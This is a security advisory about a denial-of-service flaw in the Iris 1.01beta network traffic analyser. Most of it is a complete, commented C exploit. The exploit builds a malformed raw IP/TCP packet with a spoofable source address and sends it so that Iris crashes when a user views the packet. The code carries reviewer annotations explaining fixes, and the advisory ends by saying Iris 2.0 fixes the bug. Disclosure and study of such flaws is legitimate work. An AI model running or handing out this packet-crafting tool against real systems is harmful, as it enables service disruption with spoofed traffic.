COMMAND

    Iris

SYSTEMS AFFECTED

    Iris 1.01beta

PROBLEM

    Wouter ter Maat (aka grazer) found the following.  There exists a
    vulnerability that causes the Iris network traffic analyser to hang
    or terminate.  The exploit below demonstrates the bug: it sends a
    single malformed packet to the remote host, and when a user on that
    host opens the packet in Iris (to examine it) Iris quits, leaving an
    error message.

    /* Denial of Service attack against :
     * Iris The Network Traffic Analyzer beta 1.01
     * ------------------------------------------------
     *
     * Will create an incorrect packet which will cause
     * Iris to hang when it is opened by a user.
     *
     * Vulnerability found by : grazer@digit-labs.org
     * Exploit code by : grazer@digit-labs.org
     *
     * Respect to the guys from eEye, for their fast
     * response.
     *
     * greetings to hit2000, hwa, synnergy, security.is
     *              digit-labs.
     *
     * ---------------> free sk8!!!! <-----------------
     *
     * ------------------------------------------------
     * http://www.digit-labs.org
     *                           grazer@digit-labs.org
     * ------------------------------------------------
     */

    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/tcp.h>

    /* Builds the malformed probe packet and sends it on raw socket sfd;
     * srcaddr/dstaddr are IPv4 addresses in network byte order.  Defined below. */
    int build_packet(int sfd, u_long srcaddr, u_long dstaddr);

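    /*
     * TCP pseudo-header layout: source address, destination address, a
     * "zero" byte, protocol number and TCP length (12 bytes on the wire).
     * build_packet() writes this directly into the packet buffer behind the
     * IP header rather than feeding it to a checksum.
     *
     * The address fields are in_addr_t (32 bits) rather than u_long: u_long
     * is 8 bytes on LP64 hosts, which would make this struct 24 bytes and
     * silently change every byte that follows the IP header on the wire.
     */
    struct pseudo {
        in_addr_t saddr;
        in_addr_t daddr;
        uint8_t   zero;
        uint8_t   protocol;
        uint16_t  length;
    };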

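    /*
     * Entry point.  argv[1] is the source address to put in the IP header
     * (dotted quad; it is copied verbatim, so it can be spoofed), argv[2]
     * the target host name or address.  Opens a raw IPPROTO_TCP socket
     * (requires root / raw-socket privilege), enables IP_HDRINCL so the
     * hand-built IP header from build_packet() is sent as-is, sends one
     * packet and exits.
     *
     * Returns 0 when the packet was sent, EXIT_FAILURE on any error
     * (unresolvable host, bad source address, socket/setsockopt/sendto
     * failure).  Usage errors exit with EXIT_FAILURE as well.
     */
    int main(int argc, char **argv)
    {
        int rawfd, one = 1;
        struct hostent *he;
        struct in_addr source_ip, desti_ip;

        /* Usage check.  (Written as `while' in the original, which only
         * worked because the body always exits.) */
        if (argc < 3) {
            fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
            fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0]);
            exit(EXIT_FAILURE);
        }

        fprintf(stderr, "\nStarting Iris DoS...\n");

        /* Resolve the target and actually use the result.  The original
         * resolved argv[2] but then fed the string to inet_addr(), so a
         * host name (rather than a dotted quad) became INADDR_NONE. */
        he = gethostbyname(argv[2]);
        if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL
            || he->h_length != (int) sizeof desti_ip) {
            fprintf(stderr, "\nCannot resolve host %s\n", argv[2]);
            exit(EXIT_FAILURE);
        }
        memcpy(&desti_ip, he->h_addr_list[0], sizeof desti_ip);

        /* The source goes straight into the IP header, so reject garbage
         * here instead of sending 255.255.255.255 as the source. */
        source_ip.s_addr = inet_addr(argv[1]);
        if (source_ip.s_addr == INADDR_NONE) {
            fprintf(stderr, "\nInvalid source address %s\n", argv[1]);
            exit(EXIT_FAILURE);
        }

        if ((rawfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
            fprintf(stderr, "\n You need root for this..");
            exit(EXIT_FAILURE);
        }

        /* Pass the real option length (an int); the original passed 1.
         * Without IP_HDRINCL the kernel would prepend its own IP header
         * and the crafted one would be sent as payload. */
        if (setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one) < 0) {
            perror("setsockopt(IP_HDRINCL)");
            close(rawfd);
            exit(EXIT_FAILURE);
        }

        if (build_packet(rawfd, source_ip.s_addr, desti_ip.s_addr) < 0) {
            close(rawfd);
            return EXIT_FAILURE;
        }

        close(rawfd);
        return 0;
    }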


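    /*
     * Build the malformed IP/TCP packet that triggers the Iris bug and send
     * it once on the raw socket sfd.
     *
     *   sfd      raw IPPROTO_TCP socket with IP_HDRINCL enabled (see main)
     *   srcaddr  IPv4 source address, network byte order; copied into the
     *            IP header verbatim, so it may be spoofed
     *   dstaddr  IPv4 destination address, network byte order
     *
     * Returns 1 after a successful sendto(), -1 (with a perror() diagnostic)
     * when sendto() fails.
     *
     * The packet bytes are deliberately left exactly as the original exploit
     * produced them -- all-ones version, header length, id and fragment
     * offset, and a pseudo-header "zero" byte of 1 -- because that is the
     * packet the advisory describes.  Only the unchecked syscall was fixed.
     */
    int build_packet(int sfd, u_long srcaddr, u_long dstaddr)
    {
        /* The buffer is laid out [ip][pseudo][tcp], but only wire_len =
         * sizeof(ip) + sizeof(tcphdr) bytes are transmitted, so what follows
         * the IP header on the wire is the pseudo header and then whatever
         * prefix of tcp still fits.  Presumably the pseudo header was meant
         * for checksumming and this layout is accidental, but it is what the
         * advisory's "incorrect packet" consists of, so it is preserved. */
        unsigned char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
        const size_t wire_len = sizeof(struct ip) + sizeof(struct tcphdr);
        struct sockaddr_in sin;
        struct ip *ip = (struct ip *) packet;
        struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
        struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
                                                + sizeof(struct pseudo));

        memset(packet, 0, sizeof packet);
        memset(&sin, 0, sizeof sin);

        pseudo->saddr = srcaddr;
        pseudo->daddr = dstaddr;
        pseudo->zero = 1;                       /* sic: deliberately not zero */
        pseudo->protocol = IPPROTO_TCP;
        pseudo->length = htons(sizeof(struct tcphdr));

        /* Bogus IP header.  The original assigned -1; the explicit masks
         * below produce identical bits in these unsigned fields. */
        ip->ip_v = 0xf;
        ip->ip_hl = 0xf;                        /* claims 60-byte header in a 40-byte packet */
        ip->ip_id = 0xffff;
        ip->ip_off = 0xffff;
        ip->ip_src.s_addr = srcaddr;
        ip->ip_dst.s_addr = dstaddr;
        ip->ip_p = IPPROTO_TCP;
        ip->ip_ttl = 40;
        /* Kept in host byte order as in the original.  Linux rewrites
         * ip_len on IP_HDRINCL sockets and classic BSD expects host order,
         * so "fixing" it with htons() is not clearly right -- confirm on
         * the platform you run this from. */
        ip->ip_len = (uint16_t) wire_len;

        /* rand() is never seeded in this file, so these are the same on
         * every run.  Their bytes lie at or beyond the end of wire_len
         * (exactly where depends on sizeof(struct pseudo)), so they have
         * little or no effect on what is sent.
         * NOTE(review): on glibc `ack` is the one-bit ACK flag, not the
         * 32-bit acknowledgement number (`ack_seq`); left as written. */
        tcp->seq = htonl(rand());
        tcp->ack = htonl(rand());

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = dstaddr;

        /* The original ignored sendto()'s result and always reported
         * success; an EPERM/EBADF/ENETUNREACH now surfaces to the caller. */
        if (sendto(sfd, packet, wire_len, 0, (struct sockaddr *) &sin, sizeof sin) < 0) {
            perror("sendto");
            return -1;
        }

        fprintf(stderr, "\n Packet send... \n\n");
        return 1;
    }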

    The one thing to  note is that a user has to actually click on  and
    view the "evil" packet in order for Iris to crash.  Simply  running
    Iris, sniffing, and receiving the "evil" packet  without  selecting
    it  for viewing does not crash Iris; the attack therefore  requires
    user interaction on the target.

SOLUTION

    This indeed  is a  bug in  Iris 1.01  beta and  it has  been fixed
    in Iris 2.0.